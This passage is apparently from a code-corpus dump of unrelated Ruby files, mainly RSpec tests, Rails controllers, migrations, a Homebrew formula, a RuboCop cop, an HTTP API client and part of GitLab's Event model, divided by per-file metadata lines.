it { is_expected.to redirect_to(controller.comable.signin_order_path) }
end
end
describe "PUT 'update' with state 'orderer'" do
let(:order_attributes) { attributes_for(:order, :for_orderer) }
before { current_order.update_attributes(order_attributes) }
context 'when not exist bill address' do
before { put :update, state: :orderer }
its(:response) { is_expected.to render_template(:orderer) }
its(:response) { is_expected.not_to be_redirect }
it 'has assigned @order with errors' do
expect(assigns(:order).errors.any?).to be true
expect(assigns(:order).errors[:bill_address]).to be
end
end
context 'when input new bill address' do
before { put :update, state: :orderer, order: { bill_address_attributes: address_attributes } }
its(:response) { is_expected.to redirect_to(controller.comable.next_order_path(state: :delivery)) }
it 'has assigned @order with bill address' do
expect(assigns(:order).bill_address).to be
expect(assigns(:order).bill_address.attributes).to include(address_attributes.stringify_keys)
end
end
end
describe "GET 'edit' with state 'delivery'" do
let(:order_attributes) { attributes_for(:order, :for_delivery) }
before { current_order.update_attributes(order_attributes) }
before { get :edit, state: :delivery }
its(:response) { is_expected.to render_template(:delivery) }
its(:response) { is_expected.not_to be_redirect }
end
describe "PUT 'update' with state 'delivery'" do
let(:order_attributes) { attributes_for(:order, :for_delivery) }
before { current_order.update_attributes(order_attributes) }
context 'when not exist ship address' do
before { put :update, state: :delivery }
its(:response) { is_expected.to render_template(:delivery) }
its(:response) { is_expected.not_to be_redirect }
it 'has assigned @order with errors' do
expect(assigns(:order).errors.any?).to be true
expect(assigns(:order).errors[:ship_address]).to be
end
end
context 'when input new shipping address' do
before { put :update, state: :delivery, order: { ship_address_attributes: address_attributes } }
its(:response) { is_expected.to redirect_to(controller.comable.next_order_path(state: :shipment)) }
it 'has assigned @order with ship address' do
expect(assigns(:order).ship_address).to be
expect(assigns(:order).ship_address.attributes).to include(address_attributes.stringify_keys)
end
end
end
describe "GET 'edit' with state 'shipment'" do
let(:order_attributes) { attributes_for(:order, :for_shipment) }
before { current_order.update_attributes(order_attributes) }
before { get :edit, state: :shipment }
its(:response) { is_expected.to render_template(:shipment) }
its(:response) { is_expected.not_to be_redirect }
end
describe "PUT 'update' with state 'shipment'" do
let(:order_attributes) { attributes_for(:order, :for_shipment) }
before { current_order.update_attributes(order_attributes) }
before { put :update, state: :shipment, order: { shipments_attributes: { '0' => { shipment_method_id: shipment_method.id } } } }
its(:response) { is_expected.to redirect_to(controller.comable.next_order_path(state: :payment)) }
it 'has assigned @order with shipemnt method' do
expect(assigns(:order).shipments.first.shipment_method).to eq(shipment_method)
end
end
describe "GET 'edit' with state 'payment'" do
let(:order_attributes) { attributes_for(:order, :for_payment) }
before { current_order.update_attributes(order_attributes) }
before { get :edit, state: :payment }
its(:response) { is_expected.to render_template(:payment) }
its(:response) { is_expected.not_to be_redirect }
end
describe "PUT 'update' with state 'payment'" do
let(:order_attributes) { attributes_for(:order, :for_payment, shipments: [shipment]) }
let(:shipment) { build(:shipment, shipment_method: shipment_method) }
before { current_order.update_attributes(order_attributes) }
before { put :update, state: :payment, order: { payment_attributes: { payment_method_id: payment_method.id } } }
its(:response) { is_expected.to redirect_to(controller.comable.next_order_path(state: :confirm)) }
it 'has assigned @order with payment method' do
expect(assigns(:order).payment.payment_method).to eq(payment_method)
end
end
describe "GET 'edit' with state 'confirm'" do
let(:order_attributes) { attributes_for(:order, :for_confirm) }
before { current_order.update_attributes(order_attributes) }
before { get :edit, state: :confirm }
its(:response) { is_expected.to render_template(:confirm) }
its(:response) { is_expected.not_to be_redirect }
end
describe "POST 'create'" do
let(:order_attributes) { attributes_for(:order, :for_confirm, shipments: [shipment]) }
let(:shipment) { build(:shipment, shipment_method: shipment_method, shipment_items: [shipment_item]) }
let(:shipment_item) { build(:shipment_item, stock: stock) }
before do
current_order.attributes = order_attributes
# Do not check out of stock.
current_order.save!(validate: false)
end
it "renders the 'create' template" do
post :create
expect(response).to render_template(:create)
end
it 'has flash messages' do
post :create
expect(flash[:notice]).to eq Comable.t('orders.success')
end
it 'has assigned completed @order' do
post :create
expect(assigns(:order).completed?).to be true
end
it 'has assigned completed @order with a item' do
post :create
expect(assigns(:order).order_items.count).to eq(1)
end
context 'when product is out of stock' do
let(:stock) { create(:stock, :unstocked) }
it 'redirects to the shopping cart' do
post :create
expect(response).to redirect_to(controller.comable.cart_path)
end
it 'has flash messages' do
post :create
expect(flash[:alert]).to eq(Comable.t('errors.messages.out_of_stocks'))
end
end
context 'when just became out of stock' do
before { stock.update_attributes(quantity: 0) }
it "redirects to 'confirm' page" do
post :create
expect(response).to redirect_to(controller.comable.next_order_path(state: :confirm))
end
it 'has flash messages' do
post :create
expect(flash[:alert]).to eq(assigns(:order).errors.full_messages.join)
end
end
end
context 'when checkout flow is incorrect' do
let(:order_attributes) { attributes_for(:order, :for_orderer) }
before { current_order.update_attributes(order_attributes) }
it "redirects the 'orderer' page" do
post :create
expect(response).to redirect_to(controller.comable.next_order_path(state: :orderer))
end
end
end
context 'when guest' do
it_behaves_like 'checkout' do
let(:user) { Comable::User.new.with_cookies(cookies) }
end
end
context 'when user is signed in' do
it_behaves_like 'checkout' do
let(:user) { create(:user) }
end
end
describe 'order mailer' do
let!(:store) { create(:store, :email_activate) }
let(:order_attributes) { attributes_for(:order, :for_confirm) }
let(:user) { Comable::User.new.with_cookies(cookies) }
before { controller.current_order.update_attributes(order_attributes) }
before { allow(controller).to receive(:current_comable_user).and_return(user) }
before { user.add_cart_item(product) }
it 'sent a mail' do
expect { post :create }.to change { ActionMailer::Base.deliveries.length }.by(1)
end
context 'when email is empty' do
let!(:store) { create(:store, :email_activate, email: nil) }
it 'not sent a mail' do
expect { post :create }.to change { ActionMailer::Base.deliveries.length }.by(0)
end
end
end
end
| 34.58147 | 134 | 0.66177 |
0830d38fc704c35a8ce8151f9cfe4eaab3d0bd20
| 1,241 |
class Gws::Presence::Group::UsersController < ApplicationController
include Gws::BaseFilter
include Gws::CrudFilter
include Gws::Presence::UserFilter
prepend_view_path "app/views/gws/presence/users"
private
def set_crumbs
set_group
@crumbs << [t("modules.gws/presence"), gws_presence_users_path]
@crumbs << [@group.trailing_name, gws_presence_group_users_path(group: @group.id)]
end
def set_group
@group = Gws::Group.find(params[:group])
raise "404" unless @group.name.start_with?(@cur_site.name)
@groups = @cur_site.root.to_a + @cur_site.root.descendants.to_a
@custom_groups = Gws::CustomGroup.site(@cur_site).in(member_ids: @cur_user.id)
end
def items
@items = @group.users.search(params[:s]).page(params[:page]).per(25)
end
public
def index
items
@table_url = table_gws_presence_group_users_path(site: @cur_site, group: @group)
@paginate_params = { controller: 'gws/presence/group/users', action: 'index' }
end
def table
items
render file: :table, layout: false
end
def portlet
items
@manageable_users, @group_users = @items.partition { |item| @editable_user_ids.include?(item.id) }
render file: :portlet, layout: false
end
end
| 26.404255 | 102 | 0.707494 |
f791b0ea530d7ff2854f66666bca41cc81fe8f18
| 302 |
module Testbot
# Don't forget to update readme and changelog
def self.version
version = "0.7.9"
dev_version_file = File.join(File.dirname(__FILE__), '..', '..', 'DEV_VERSION')
if File.exists?(dev_version_file)
version += File.read(dev_version_file)
end
version
end
end
| 23.230769 | 83 | 0.668874 |
b97bb89ad393020521ec9634b4c8c8eab2a208bf
| 3,048 |
require File.dirname(__FILE__) + '/../../spec_helper'
describe 'Spree::Calculator::AdvancedFlatPercent based on master_price' do
let(:calculator) { Spree::Calculator::AdvancedFlatPercent.new }
let(:order) { FactoryGirl.create(:order,
:line_items => [
FactoryGirl.build(:line_item, :price => 10, :quantity => 1),
FactoryGirl.build(:line_item, :price => 20, :quantity => 1)
]
)}
before do
allow(calculator).to receive(:preferred_flat_percent).and_return(10)
allow(calculator).to receive(:preferred_based_on_cost_price).and_return(false)
end
context "compute" do
it "should compute amount correctly" do
expect(calculator.compute(order)).to eq(-3.0)
end
it "should round result correctly" do
allow(order).to receive(:line_items).and_return([
FactoryGirl.create(:line_item, :price => 10.56, :quantity => 1),
FactoryGirl.create(:line_item, :price => 20.49, :quantity => 1)
])
expect(calculator.compute(order)).to eq(-3.11)
allow(order).to receive(:line_items).and_return([
FactoryGirl.create(:line_item, :price => 10.56, :quantity => 1),
FactoryGirl.create(:line_item, :price => 20.48, :quantity => 1)])
expect(calculator.compute(order)).to eq(-3.10)
end
end
end
describe 'Spree::Calculator::AdvancedFlatPercent based on cost_price' do
let(:calculator) { Spree::Calculator::AdvancedFlatPercent.new }
let(:variant1) { FactoryGirl.create(:variant, :cost_price => 3, :price => 5) }
let(:variant2) { FactoryGirl.create(:variant, :cost_price => 12, :price => 20) }
let(:order) { FactoryGirl.create(:order,
:line_items => [
FactoryGirl.create(:line_item, :price => 5, :quantity => 2, :variant => variant1),
FactoryGirl.create(:line_item, :price => 20, :quantity => 1, :variant => variant2)
]
)}
before do
allow(calculator).to receive(:preferred_flat_percent).and_return(15)
allow(calculator).to receive(:preferred_based_on_cost_price).and_return(true)
end
context "compute" do
it "should compute amount correctly" do
expect(calculator.compute(order)).to eq(BigDecimal.new("-9.30"))
end
it "should round result correctly" do
allow(variant1).to receive(:cost_price).and_return(2.7)
allow(variant2).to receive(:cost_price).and_return(12.35)
expect(calculator.compute(order)).to eq(BigDecimal.new("-9.59")) # -9.5875
allow(variant1).to receive(:cost_price).and_return(2.7)
allow(variant2).to receive(:cost_price).and_return(12.25)
expect(calculator.compute(order)).to eq(BigDecimal.new("-9.70")) # -9.7025
end
end
context "compute_item" do
it "should compute price correctly" do
expect(calculator.compute_item(variant1)).to eq(3*1.15)
allow(variant1).to receive(:cost_price).and_return(2.7)
expect(calculator.compute_item(variant1)).to eq(2.7*1.15)
allow(variant1).to receive(:cost_price).and_return(nil)
expect(calculator.compute_item(variant1)).to eq(5)
end
end
end
| 38.1 | 89 | 0.677165 |
6158f365dfc3ec933467138529d126f9c3ca45a6
| 187 |
FactoryGirl.define do
factory :user, class: Subscribem::User do
sequence(:email) {|n| "test#{n}@example.com"}
password "password"
password_confirmation "password"
end
end
| 23.375 | 49 | 0.700535 |
edb6ce27bb995cb1c39d087a71fdc549d57f80e6
| 1,376 |
require 'active_record'
require 'fileutils'
module Sinatodo
# Module that handles connecting to the database
# @author yasugahira0810
module DB
# Connects to the database and creates the table
# @return [void]
def self.prepare
database_path = File.join(ENV['HOME'], '.sinatodo', 'sinatodo.db')
connect_database database_path
create_table_if_not_exists database_path
end
def self.connect_database(path)
spec = {adapter: 'sqlite3', database: path}
ActiveRecord::Base.establish_connection spec
end
def self.create_table_if_not_exists(path)
create_database_path path
connection = ActiveRecord::Base.connection
return if connection.table_exists?(:tasks)
# null: false is declared here, but with just this, records can actually still be saved,
# so validation ends up being done with Active Record's validates method. (Not fully understood.)
connection.create_table :tasks do |t|
t.column :name, :string, null: false
t.column :content, :text, null: false
t.column :status, :integer, default: 0, null: false
t.timestamps null: false
end
connection.add_index :tasks, :status
connection.add_index :tasks, :created_at
end
def self.create_database_path(path)
FileUtils.mkdir_p File.dirname(path)
end
# Restrict the visibility of methods that do not need to be public to private
private_class_method :connect_database, :create_table_if_not_exists, :create_database_path
end
end
| 26.980392 | 94 | 0.704215 |
f7a9965c05288d96b10011350e2502c62479f3d5
| 1,085 |
# frozen_string_literal: true
require 'helper'
class TestFFaker < Test::Unit::TestCase
include DeterministicHelper
def test_version
assert FFaker::VERSION.is_a?(String)
end
def test_numerify
assert FFaker.numerify('###').match(/\d{3}/)
assert_deterministic { FFaker.numerify('###') }
end
def test_numerify_with_array
assert FFaker.numerify(['###', '###']).match(/\d{3}/)
assert_deterministic { FFaker.numerify(['###', '###']) }
end
def test_letterify
assert FFaker.letterify('???').match(/[a-z]{3}/)
assert_deterministic { FFaker.letterify('???') }
end
def test_letterify_with_array
assert FFaker.letterify(['???', '???']).match(/[a-z]{3}/)
assert_deterministic { FFaker.letterify(['???', '???']) }
end
def test_bothify
assert FFaker.bothify('???###').match(/[a-z]{3}\d{3}/)
assert_deterministic { FFaker.bothify('???###') }
end
def test_bothify_with_array
assert FFaker.bothify(['???###', '???###']).match(/[a-z]{3}\d{3}/)
assert_deterministic { FFaker.bothify(['???###', '???###']) }
end
end
| 25.833333 | 70 | 0.613825 |
e88641c085c60fce9ba3cb625e6e1a93eaad3196
| 397 |
class Admin::Mygengo::AccountController < MygengoController
before_filter :assets_global
def index
mygengo_requests do
@account = Mugen::Account.balance || {}
@stats = Mugen::Account.stats
end
@account.merge! @stats if @stats
end
private
def assets_global
include_stylesheet 'admin/extensions/mygengo/mugen'
end
end
| 22.055556 | 59 | 0.642317 |
38e684a3b3f833cd3e78519b519ba623d736a241
| 3,843 |
require 'test_helper'
module Radiator
class ApiTest < Radiator::Test
def setup
vcr_cassette('api_jsonrpc') do
@api = Radiator::Api.new(chain_options.merge(logger: LOGGER))
end
end
def test_hashie_logger
assert Radiator::Api.new(chain_options.merge(hashie_logger: 'hashie.log'))
end
def test_method_missing
assert_raises NoMethodError do
@api.bogus
end
end
def test_all_respond_to
vcr_cassette('api_all_respond_to') do
@api.method_names.each do |key|
assert @api.respond_to?(key), "expect rpc respond to #{key}"
end
end
end
def test_all_methods
vcr_cassette('api_all_methods') do
@api.method_names.each do |key|
begin
assert @api.send key
rescue Steem::ArgumentError
next
rescue Steem::RemoteNodeError
next
end
end
end
end
def test_get_accounts_no_argument
vcr_cassette('get_accounts_no_argument') do
assert_raises Steem::ArgumentError do
@api.get_accounts
end
end
end
def test_get_accounts
vcr_cassette('get_accounts') do
@api.get_accounts(['inertia']) do |accounts|
assert_equal Hashie::Array, accounts.class, accounts.inspect
account = accounts.first
owner_key_auths = account.owner.key_auths.first
assert_equal 'STM6qpwgqwzaF8E1GsKh28E8HVRzbBdewcimKzLmn1Rjgq7SQoNUa', owner_key_auths.first
end
end
end
def test_get_feed_history
vcr_cassette('get_feed_history') do
@api.get_feed_history() do |history|
assert_equal Hashie::Mash, history.class, history.inspect
end
end
end
def test_get_account_count
vcr_cassette('get_account_count') do
@api.get_account_count do |count|
skip "Fixnum is deprecated." if count.class.to_s == 'Fixnum'
assert_equal Integer, count.class, count.inspect
end
end
end
def test_get_account_references
vcr_cassette('get_account_references') do
begin
@api.get_account_references(["2.2.27007"]) do |_, error|
assert_equal Hashie::Mash, error.class, error.inspect
end
rescue Steem::UnknownError => e
raise e unless e.inspect.include? 'condenser_api::get_account_references --- Needs to be refactored for Steem'
assert true
end
end
end
def test_get_dynamic_global_properties
vcr_cassette('get_dynamic_global_properties') do
@api.get_dynamic_global_properties do |properties|
assert_equal Hashie::Mash, properties.class, properties.inspect
end
end
end
def test_get_hardfork_version
vcr_cassette('get_hardfork_version') do
@api.get_hardfork_version do |version|
assert_equal String, version.class, version.inspect
end
end
end
def test_get_vesting_delegations
vcr_cassette('get_vesting_delegations') do
@api.get_vesting_delegations('minnowbooster', -1000, 1000) do |delegation|
assert_equal Hashie::Array, delegation.class, delegation.inspect
end
end
end
def test_get_witness_by_account
vcr_cassette('get_witness_by_account') do
@api.get_witness_by_account('') do |witness|
assert_equal NilClass, witness.class, witness.inspect
end
end
end
def test_recover_transaction
vcr_cassette('recover_transaction') do
assert_nil @api.send(:recover_transaction, [], 1, Time.now.utc), 'expect nil response from recover_transaction'
end
end
def test_backoff
assert_equal 0, @api.send(:backoff)
end
end
end
| 28.257353 | 120 | 0.64637 |
6a6a4f882c7b9843139026aba6c0cd80894c5872
| 572 |
require 'rails_helper'
RSpec.describe "papers/edit", type: :view do
before(:each) do
@paper = assign(:paper, Paper.create!(
title: "MyString",
venue: "MyString",
year: 1
))
end
it "renders the edit paper form" do
render
assert_select "form[action=?][method=?]", paper_path(@paper), "post" do
assert_select "input[name=?]", "paper[title]"
assert_select "input[name=?]", "paper[venue]"
assert_select "input[name=?]", "paper[year]"
assert_select "input[name=?]", "paper[author_ids][]"
end
end
end
| 20.428571 | 75 | 0.61014 |
21db05c0a12e54ce79172ab2ac5496e02d4b33b7
| 1,223 |
class Libmpd < Formula
desc "Higher level access to MPD functions"
homepage "https://gmpc.wikia.com/wiki/Gnome_Music_Player_Client"
url "https://www.musicpd.org/download/libmpd/11.8.17/libmpd-11.8.17.tar.gz"
sha256 "fe20326b0d10641f71c4673fae637bf9222a96e1712f71f170fca2fc34bf7a83"
bottle do
cellar :any
rebuild 1
sha256 "704760154c39e2917a85dc30eae29de1f3f7f114ac037715911edf7dcfbb4844" => :mojave
sha256 "366b75cc5d921e946f5d987cb2627a9d66d04db36032ff98f5dd881ff0df754e" => :high_sierra
sha256 "e5affb45da15f4b7df327b993216d44f76f88da1e8c2f1051a8045c63a5a9d04" => :sierra
sha256 "d4b932dc975f7fe87d8e26ebe9080d3633c33a66438c29d0403160adb6c7ada5" => :el_capitan
sha256 "36471b19608eea97bc9916fdb65937fbb385ade1bf43aac4c01031d3c3c1192f" => :yosemite
sha256 "8e79457e677bf003a8e5374f1f7ccffba5ef237e577a0e0831ccb2036101b357" => :mavericks
sha256 "85c97dbfb2a3a419495e702df451b00bf84e355d69c2e8512a54014ff702f45c" => :mountain_lion
end
depends_on "pkg-config" => :build
depends_on "gettext"
depends_on "glib"
def install
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
end
| 42.172414 | 95 | 0.780049 |
1cf9f4c3c354ed0a5043f79d0dedd2d27df44aaf
| 2,069 |
# frozen_string_literal: true
module RuboCop
module Cop
module Style
# Use a guard clause instead of wrapping the code inside a conditional
# expression
#
# @example
# # bad
# def test
# if something
# work
# end
# end
#
# # good
# def test
# return unless something
# work
# end
#
# # also good
# def test
# work if something
# end
#
# # bad
# if something
# raise 'exception'
# else
# ok
# end
#
# # good
# raise 'exception' if something
# ok
class GuardClause < Cop
include MinBodyLength
MSG = 'Use a guard clause instead of wrapping the code inside a ' \
'conditional expression.'
def on_def(node)
body = node.body
return unless body
if body.if_type?
check_ending_if(body)
elsif body.begin_type? && body.children.last.if_type?
check_ending_if(body.children.last)
end
end
alias on_defs on_def
def on_if(node)
return if accepted_form?(node) || !contains_guard_clause?(node)
add_offense(node, location: :keyword)
end
private
def check_ending_if(node)
return if accepted_form?(node, true) || !min_body_length?(node)
add_offense(node, location: :keyword)
end
def accepted_form?(node, ending = false)
accepted_if?(node, ending) || node.condition.multiline?
end
def accepted_if?(node, ending)
return true if node.modifier_form? || node.ternary?
if ending
node.else?
else
!node.else? || node.elsif?
end
end
def contains_guard_clause?(node)
node.if_branch&.guard_clause? ||
node.else_branch&.guard_clause?
end
end
end
end
end
| 22.247312 | 76 | 0.515225 |
873b03eef2d30d29a527c3f31528ab4dc27772c9
| 200 |
class AddAuthTokenToUsers < ActiveRecord::Migration[5.1]
def change
add_column :users, :api_token, :string
add_column :users, :api_user, :boolean
add_index :users, :api_token
end
end
| 22.222222 | 56 | 0.725 |
e8ef0f5f98a3efba3370302471def629f1f5be20
| 1,912 |
# The test environment is used exclusively to run your application's
# test suite. You never need to work with it otherwise. Remember that
# your test database is "scratch space" for the test suite and is wiped
# and recreated between test runs. Don't rely on the data there!
Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
config.cache_classes = false
# Do not eager load code on boot. This avoids loading your whole application
# just for the purpose of running a single test. If you are using a tool that
# preloads Rails for running tests, you may have to set it to true.
config.eager_load = false
# Configure public file server for tests with Cache-Control for performance.
config.public_file_server.enabled = true
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{1.hour.to_i}"
}
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
config.cache_store = :null_store
# Raise exceptions instead of rendering exception templates.
config.action_dispatch.show_exceptions = false
# Disable request forgery protection in test environment.
config.action_controller.allow_forgery_protection = false
# Store uploaded files on the local file system in a temporary directory.
config.active_storage.service = :test
config.action_mailer.perform_caching = false
# Tell Action Mailer not to deliver emails to the real world.
# The :test delivery method accumulates sent emails in the
# ActionMailer::Base.deliveries array.
config.action_mailer.delivery_method = :test
# Print deprecation notices to the stderr.
config.active_support.deprecation = :stderr
# Raises error for missing translations.
# config.action_view.raise_on_missing_translations = true
end
| 39.020408 | 85 | 0.774059 |
ed8156358137d934d724b23c36da94f7ba57c716
| 149 |
require 'test/unit'
class CanHasAssetsTest < Test::Unit::TestCase
# Replace this with your real tests.
def test_this_plugin
flunk
end
end
| 16.555556 | 45 | 0.738255 |
e936872a416ab54a42c8f4237d55d6e252178f66
| 2,500 |
# frozen_string_literal: true
require 'faraday'
require 'faraday_middleware'
module TimeTree
# Command for HTTP request.
class HttpCommand
def initialize(host, client)
@host = host
@client = client
@logger = TimeTree.configuration.logger
end
# @param path [String] String or URI to access.
# @param params [Hash] Hash of URI query unencoded key/value pairs.
def get(path, params = {})
@logger.info "GET #{connection.build_url("#{@host}#{path}", params)}"
res = connection.get path, params
@client.update_ratelimit(res)
@logger.debug "Response status:#{res.status}, body:#{res.body}"
res
end
# @param path [String] String or URI to access.
# @param body_params [Hash]
# The request body that will eventually be converted to JSON.
def post(path, body_params = {}, &block)
@logger.debug "POST #{@host}#{path} body:#{body_params}"
headers = {'Content-Type' => 'application/json'}
res = connection.run_request :post, path, body_params.to_json, headers, &block
@client.update_ratelimit(res)
@logger.debug "Response status:#{res.status}, body:#{res.body}"
res
end
# @param path [String] String or URI to access.
# @param body_params [Hash]
# The request body that will eventually be converted to JSON.
def put(path, body_params = {})
@logger.debug "PUT #{@host}#{path} body:#{body_params}"
headers = {'Content-Type' => 'application/json'}
res = connection.run_request :put, path, body_params.to_json, headers
@client.update_ratelimit(res)
@logger.debug "Response status:#{res.status}, body:#{res.body}"
res
end
# @param path [String] String or URI to access.
# @param params [Hash] Hash of URI query unencoded key/value pairs.
def delete(path, params = {})
@logger.debug "DELETE #{@host}#{path} params:#{params}"
res = connection.delete path, params
@client.update_ratelimit(res)
@logger.debug "Response status:#{res.status}, body:#{res.body}"
res
end
private
def connection
Faraday.new(
url: @host,
headers: base_request_headers
) do |builder|
builder.response :json, parser_options: {symbolize_names: true}, content_type: /\bjson$/
end
end
def base_request_headers
{
'Accept' => 'application/vnd.timetree.v1+json',
'Authorization' => "Bearer #{@client.token}"
}
end
end
end
| 32.051282 | 96 | 0.6392 |
1da49573d18d03d700ade052eb42c59169b9bd30
| 227 |
class IncreaseLengthOfEntouragesUuidV2 < ActiveRecord::Migration[4.2]
def up
change_column :entourages, :uuid_v2, :string, limit: 71
end
def down
change_column :entourages, :uuid_v2, :string, limit: 12
end
end
| 22.7 | 69 | 0.735683 |
ace90161c34b70d557d41feb19c364b6419dffa7
| 642 |
class AnnouncementsController < ApplicationController
before_filter :authenticate_user!
def index
@announcements = current_user.announcements
#@announcements = Announcement.all
end
def new
@announcement = Announcement.new
end
def create
@announcement = Announcement.new(announcement_params)
@announcement.user_id = current_user.id
if @announcement.save
Notification.announcement(@announcement).deliver!
redirect_to announcements_path,notice: "successfully announced"
else
render action: "new"
end
end
private
def announcement_params
params[:announcement].permit(:title,:body,:user_id)
end
end
| 18.882353 | 66 | 0.774143 |
1cd180b4755441d85c30e7409215551ebf8fce4f
| 2,838 |
require 'spec_helper'
require 'ostruct'
describe Aef::Hosts::Helpers do
include Aef::Hosts::Helpers
let(:model) {
model = OpenStruct.new(
:name => 'test',
:cache_filled => true,
:elements => ['fnord', 'eris']
)
def model.cache_filled?
cache_filled
end
model
}
context "#validate_options" do
it "should accept options with a subset of valid option keys" do
options = {:valid1 => 123, :valid2 => 456}
expect {
validate_options(options, :valid1, :valid2, :valid3)
}.not_to raise_error
end
it "should accept options with exactly the valid option keys" do
options = {:valid1 => 123, :valid2 => 456, :valid3 => 789}
expect {
validate_options(options, :valid1, :valid2, :valid3)
}.not_to raise_error
end
it "should deny options with invalid option keys" do
options = {:valid1 => 123, :invalid => 'test'}
expect {
validate_options(options, :valid1, :valid2, :valid3)
}.to raise_error(ArgumentError, 'Invalid option keys: :invalid')
end
end
context "#to_pathname" do
it "should return nil when nil is given" do
to_pathname(nil).should be_nil
end
it "should return a Pathname when a String is given" do
to_pathname('abc/def').should eql Pathname.new('abc/def')
end
it "should return a Pathname when a Pathname is given" do
to_pathname(Pathname.new('abc/def')).should eql Pathname.new('abc/def')
end
end
context "generate_inspect" do
it "should be able to render a minimal inspect output" do
generate_inspect(model).should eql %{#<OpenStruct>}
end
it "should be able to render a normal attribute in inspect output" do
generate_inspect(model, :name).should eql %{#<OpenStruct: name="test">}
end
it "should be able to render an attribute by custom String in inspect output" do
generate_inspect(model, 'abc=123').should eql %{#<OpenStruct: abc=123>}
end
it "should be able to render a special cache attribute in inspect output" do
generate_inspect(model, :cache).should eql %{#<OpenStruct: cached!>}
end
it "should not render a special cache attribute in inspect output if cache is not filled" do
model.cache_filled = false
generate_inspect(model, :cache).should eql %{#<OpenStruct>}
end
it "should be able to render elements in inspect output" do
generate_inspect(model, :elements).should eql <<-STRING.chomp
#<OpenStruct: elements=[
"fnord",
"eris"
]>
STRING
end
end
context "generate_elements_partial" do
it "should be able to render elements in inspect output" do
generate_elements_partial(['fnord', 'eris']).should eql <<-STRING.chomp
elements=[
"fnord",
"eris"
]
STRING
end
end
end
| 27.288462 | 96 | 0.654686 |
1ab8a1a7f4d6ccf046b6c79bc440139148765fa4
| 156 |
class Interfaces::FromReturnInteractor < IIInteractor::Base
context_in :in
context_out :out, from_return: true
def call
'return value'
end
end
| 17.333333 | 59 | 0.74359 |
6a35bca72c53860155dd19720dc6a3a19646b7e3
| 9,432 |
# frozen_string_literal: true
class Event < ActiveRecord::Base
include Sortable
include IgnorableColumn
include FromUnion
default_scope { reorder(nil) }
CREATED = 1
UPDATED = 2
CLOSED = 3
REOPENED = 4
PUSHED = 5
COMMENTED = 6
MERGED = 7
JOINED = 8 # User joined project
LEFT = 9 # User left project
DESTROYED = 10
EXPIRED = 11 # User left project due to expiry
ACTIONS = HashWithIndifferentAccess.new(
created: CREATED,
updated: UPDATED,
closed: CLOSED,
reopened: REOPENED,
pushed: PUSHED,
commented: COMMENTED,
merged: MERGED,
joined: JOINED,
left: LEFT,
destroyed: DESTROYED,
expired: EXPIRED
).freeze
TARGET_TYPES = HashWithIndifferentAccess.new(
issue: Issue,
milestone: Milestone,
merge_request: MergeRequest,
note: Note,
project: Project,
snippet: Snippet,
user: User
).freeze
RESET_PROJECT_ACTIVITY_INTERVAL = 1.hour
REPOSITORY_UPDATED_AT_INTERVAL = 5.minutes
delegate :name, :email, :public_email, :username, to: :author, prefix: true, allow_nil: true
delegate :title, to: :issue, prefix: true, allow_nil: true
delegate :title, to: :merge_request, prefix: true, allow_nil: true
delegate :title, to: :note, prefix: true, allow_nil: true
belongs_to :author, class_name: "User"
belongs_to :project
belongs_to :target, -> {
# If the association for "target" defines an "author" association we want to
# eager-load this so Banzai & friends don't end up performing N+1 queries to
# get the authors of notes, issues, etc. (likewise for "noteable").
incs = %i(author noteable).select do |a|
reflections['events'].active_record.reflect_on_association(a)
end
incs.reduce(self) { |obj, a| obj.includes(a) }
}, polymorphic: true # rubocop:disable Cop/PolymorphicAssociations
has_one :push_event_payload
# Callbacks
after_create :reset_project_activity
after_create :set_last_repository_updated_at, if: :push?
after_create :track_user_interacted_projects
# Scopes
scope :recent, -> { reorder(id: :desc) }
scope :code_push, -> { where(action: PUSHED) }
scope :in_projects, -> (projects) do
sub_query = projects
.except(:order)
.select(1)
.where('projects.id = events.project_id')
where('EXISTS (?)', sub_query).recent
end
scope :with_associations, -> do
# We're using preload for "push_event_payload" as otherwise the association
# is not always available (depending on the query being built).
includes(:author, :project, project: [:project_feature, :import_data, :namespace])
.preload(:target, :push_event_payload)
end
scope :for_milestone_id, ->(milestone_id) { where(target_type: "Milestone", target_id: milestone_id) }
# Authors are required as they're used to display who pushed data.
#
# We're just validating the presence of the ID here as foreign key constraints
# should ensure the ID points to a valid user.
validates :author_id, presence: true
self.inheritance_column = 'action'
class << self
def model_name
ActiveModel::Name.new(self, nil, 'event')
end
def find_sti_class(action)
if action.to_i == PUSHED
PushEvent
else
Event
end
end
# Update Gitlab::ContributionsCalendar#activity_dates if this changes
def contributions
where("action = ? OR (target_type IN (?) AND action IN (?)) OR (target_type = ? AND action = ?)",
Event::PUSHED,
%w(MergeRequest Issue), [Event::CREATED, Event::CLOSED, Event::MERGED],
"Note", Event::COMMENTED)
end
def limit_recent(limit = 20, offset = nil)
recent.limit(limit).offset(offset)
end
def actions
ACTIONS.keys
end
def target_types
TARGET_TYPES.keys
end
end
# rubocop:disable Metrics/CyclomaticComplexity
# rubocop:disable Metrics/PerceivedComplexity
def visible_to_user?(user = nil)
if push? || commit_note?
Ability.allowed?(user, :download_code, project)
elsif membership_changed?
Ability.allowed?(user, :read_project, project)
elsif created_project?
Ability.allowed?(user, :read_project, project)
elsif issue? || issue_note?
Ability.allowed?(user, :read_issue, note? ? note_target : target)
elsif merge_request? || merge_request_note?
Ability.allowed?(user, :read_merge_request, note? ? note_target : target)
elsif personal_snippet_note?
Ability.allowed?(user, :read_personal_snippet, note_target)
elsif project_snippet_note?
Ability.allowed?(user, :read_project_snippet, note_target)
elsif milestone?
Ability.allowed?(user, :read_milestone, project)
else
false # No other event types are visible
end
end
# rubocop:enable Metrics/PerceivedComplexity
# rubocop:enable Metrics/CyclomaticComplexity
def project_name
if project
project.full_name
else
"(deleted project)"
end
end
def target_title
target.try(:title)
end
def created?
action == CREATED
end
def push?
false
end
def merged?
action == MERGED
end
def closed?
action == CLOSED
end
def reopened?
action == REOPENED
end
def joined?
action == JOINED
end
def left?
action == LEFT
end
def expired?
action == EXPIRED
end
def destroyed?
action == DESTROYED
end
def commented?
action == COMMENTED
end
def membership_changed?
joined? || left? || expired?
end
def created_project?
created? && !target && target_type.nil?
end
def created_target?
created? && target
end
def milestone?
target_type == "Milestone"
end
def note?
target.is_a?(Note)
end
def issue?
target_type == "Issue"
end
def merge_request?
target_type == "MergeRequest"
end
def milestone
target if milestone?
end
def issue
target if issue?
end
def merge_request
target if merge_request?
end
def note
